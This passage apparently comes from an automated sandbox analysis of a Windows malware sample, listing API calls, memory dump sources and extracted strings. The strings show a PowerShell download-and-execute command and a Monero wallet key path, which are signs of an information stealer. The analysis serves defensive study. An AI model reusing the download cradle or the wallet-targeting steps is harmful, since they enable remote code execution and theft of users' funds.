                      • lstrcat.KERNEL32(?,?), ref: 0047485B
                      • lstrcat.KERNEL32(?,00E8D0D8), ref: 0047486F
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 00478D90: GetFileAttributesA.KERNEL32(00000000,?,00461B54,?,?,0048564C,?,?,00480E1F), ref: 00478D9F
                        • Part of subcall function 00474570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00474580
                        • Part of subcall function 00474570: RtlAllocateHeap.NTDLL(00000000), ref: 00474587
                        • Part of subcall function 00474570: wsprintfA.USER32 ref: 004745A6
                        • Part of subcall function 00474570: FindFirstFileA.KERNEL32(?,?), ref: 004745BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: da3694c2000756db86c66a7d858cebafb0487c499ea828783f09dc088fec2de5
                      • Instruction ID: cd2469a825fbe7f8ef36383af40438c7c55875f0e7450c9fd79d8798b0909c71
                      • Opcode Fuzzy Hash: da3694c2000756db86c66a7d858cebafb0487c499ea828783f09dc088fec2de5
                      • Instruction Fuzzy Hash: CA3144F294020867CB54F7B0DC85EE97379AB58704F40458EB31996091EF78A789CF95
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00472D85
                      Strings
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00472CC4
                      • <, xrefs: 00472D39
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00472D04
                      • ')", xrefs: 00472CB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 7a07e19d42d0ff025c22883e52c01b2a54d859d60a2a1afa8a872bf16c94c212
                      • Instruction ID: 986d51b734814894456aaa3ea15fc6a4ded32ac61b7b3754cfcedce49d7a640f
                      • Opcode Fuzzy Hash: 7a07e19d42d0ff025c22883e52c01b2a54d859d60a2a1afa8a872bf16c94c212
                      • Instruction Fuzzy Hash: ED41D171C101089ADB14FFA1C891FEEB774AF50304F50852EF11AA7191DF786A5ACFAA
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00469F41
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: 3e3d37abea82647b42a459ffd09d13c68478ed836bbbd35716ef0610fc2d88fd
                      • Instruction ID: a4cd5df7ce6256658d08e04ea828f41b63851be32c037e04062876aaf1e74c84
                      • Opcode Fuzzy Hash: 3e3d37abea82647b42a459ffd09d13c68478ed836bbbd35716ef0610fc2d88fd
                      • Instruction Fuzzy Hash: 67616570910248EBDB18EFA5CC96FEE7775AF44304F00841AF90A5F191EB786A16CB57
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,00E8D398,00000000,00020119,?), ref: 004740F4
                      • RegQueryValueExA.ADVAPI32(?,00E8DB48,00000000,00000000,00000000,000000FF), ref: 00474118
                      • RegCloseKey.ADVAPI32(?), ref: 00474122
                      • lstrcat.KERNEL32(?,00000000), ref: 00474147
                      • lstrcat.KERNEL32(?,00E8DBA8), ref: 0047415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValue
                      • String ID:
                      • API String ID: 690832082-0
                      • Opcode ID: 5cd129d67b95eb0cf7c3b100541985a04ba5f85bc9881942e33df7a8d2ff71bd
                      • Instruction ID: 31f420bc6999b52519b3011dc27ae3ffb44cbdd3ce21179def7b1ce17032b4dd
                      • Opcode Fuzzy Hash: 5cd129d67b95eb0cf7c3b100541985a04ba5f85bc9881942e33df7a8d2ff71bd
                      • Instruction Fuzzy Hash: EB419BB690010867DB14FBE0DC46FFE737DA789304F04855EB61A56181EB796B88CB92
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00477E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,00E7B738,00000000,00020119,?), ref: 00477E5E
                      • RegQueryValueExA.ADVAPI32(?,00E8D238,00000000,00000000,000000FF,000000FF), ref: 00477E7F
                      • RegCloseKey.ADVAPI32(?), ref: 00477E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: a6c918ef0723c20a0cfce7e3c21d3c57eeb5de5c8ecff088af6a4260ca9f1afe
                      • Instruction ID: c7495ab74c6121929d67dfe6cf1d463d4162fb0dd30291dc104b32e21a859da3
                      • Opcode Fuzzy Hash: a6c918ef0723c20a0cfce7e3c21d3c57eeb5de5c8ecff088af6a4260ca9f1afe
                      • Instruction Fuzzy Hash: 86118FB1A44205EBD700DFD4DD49FBBBBB9EB05B00F10815AF605A7280D7786801CFA2
                      APIs
                      • StrStrA.SHLWAPI(00E8D8F0,?,?,?,0047140C,?,00E8D8F0,00000000), ref: 0047926C
                      • lstrcpyn.KERNEL32(006AAB88,00E8D8F0,00E8D8F0,?,0047140C,?,00E8D8F0), ref: 00479290
                      • lstrlen.KERNEL32(?,?,0047140C,?,00E8D8F0), ref: 004792A7
                      • wsprintfA.USER32 ref: 004792C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: a76973ff48cecb53a9b45e934089e22b09d78d095a6717a051955200a2f89464
                      • Instruction ID: 472218a9a2e8e7580937b8457e110c82fdb4912c060f832d8bbb4cab07ec0d58
                      • Opcode Fuzzy Hash: a76973ff48cecb53a9b45e934089e22b09d78d095a6717a051955200a2f89464
                      • Instruction Fuzzy Hash: A701E575500108FFCB04EFE8C988EAE7BBAEB49350F108549F9098B201C735AE40DFA5
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004612B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 004612BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004612D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004612F5
                      • RegCloseKey.ADVAPI32(?), ref: 004612FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 45b261b9d4da57bc4227515ddbaa43924e7f096c6ab3543ea230632570e74356
                      • Instruction ID: 46f377f02281ea25ea5cdea9e4339c0f3c4180363738ed4953d0dfb501dece75
                      • Opcode Fuzzy Hash: 45b261b9d4da57bc4227515ddbaa43924e7f096c6ab3543ea230632570e74356
                      • Instruction Fuzzy Hash: E70131B9A40208BFDB00DFE0DC49FAEB7B9EB48701F00819AFA0597280D774AA01CF51
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: String___crt$Type
                      • String ID:
                      • API String ID: 2109742289-3916222277
                      • Opcode ID: 57eda2573f95f51a32562fd86631a8c673b42fe037bc90b370fb0829d44593ca
                      • Instruction ID: 7cbfaa614aca787118130c0421ac3ee0a30fd163612b44e4a9af11e87e55f80f
                      • Opcode Fuzzy Hash: 57eda2573f95f51a32562fd86631a8c673b42fe037bc90b370fb0829d44593ca
                      • Instruction Fuzzy Hash: 0E4125F150078C5EDB318B248CC4BFBBBEC9F45308F1484EDEA8E86182D2759A458F69
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00476663
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00476726
                      • ExitProcess.KERNEL32 ref: 00476755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: 4eddc07d7ca674d0ddd428a7e00e04ce25bc6d2777f5f2acdee16f8fdb8f1690
                      • Instruction ID: 1168d7090b5f78d56eec7848a04d610073ccb23b1786c759035f169956b2e70e
                      • Opcode Fuzzy Hash: 4eddc07d7ca674d0ddd428a7e00e04ce25bc6d2777f5f2acdee16f8fdb8f1690
                      • Instruction Fuzzy Hash: B6312BF1801208AADB54EB91DC85BDE7778AF44304F40919EF31966191DF786B48CF6A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00480E28,00000000,?), ref: 0047882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00478836
                      • wsprintfA.USER32 ref: 00478850
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: 97e931ddd3ecdd92d0fd12e19acb4d88bc4dfbaae7f9370a95d063526f71542c
                      • Instruction ID: 9e3e0d07a541a29a9c3fae760bdecd8ee63beeaaf78cadb22e9c744c912bca9f
                      • Opcode Fuzzy Hash: 97e931ddd3ecdd92d0fd12e19acb4d88bc4dfbaae7f9370a95d063526f71542c
                      • Instruction Fuzzy Hash: 8C21EFB1A40204ABDB04EFD4DD45FAEB7B9FB49711F10411AF605A7280C779A901CFA5
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0047951E,00000000), ref: 00478D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00478D62
                      • wsprintfW.USER32 ref: 00478D78
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: 99eaa59f846ef21382ff4683385b26767fac76a717e4ba0543e86cced1da0e9e
                      • Instruction ID: e1dfc6a2e0840ad7928af77c0da9681efd00c9f199683127b8f67069589b6731
                      • Opcode Fuzzy Hash: 99eaa59f846ef21382ff4683385b26767fac76a717e4ba0543e86cced1da0e9e
                      • Instruction Fuzzy Hash: E8E046B4A40208BBC700EFD4DC0AA6977A8EB05702F000196F90A86280DA79AA008F96
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
